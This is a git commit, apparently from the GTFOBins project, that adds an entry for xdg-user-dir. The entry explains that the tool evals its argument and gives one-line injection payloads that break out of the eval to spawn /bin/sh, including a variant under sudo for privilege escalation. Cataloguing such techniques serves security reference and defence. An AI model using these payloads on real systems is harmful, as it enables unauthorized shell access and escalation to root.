Add xdg-user-dir

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
n0tr00t 2023-09-02 07:14:16 +00:00 committed by GitHub
parent 07dca76e95
commit 08c8fafec9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 0 deletions

11
_gtfobins/xdg-user-dir.md Normal file
View File

@ -0,0 +1,11 @@
---
description: |
The current implementation of `xdg-user-dir` is basically `eval echo \${XDG_${1}_DIR:-$HOME}`, thus is can be easily used to achieve command execution.
functions:
shell:
- code: |
xdg-user-dir '}; /bin/sh #'
sudo:
- code: |
sudo xdg-user-dir '}; /bin/sh #'
---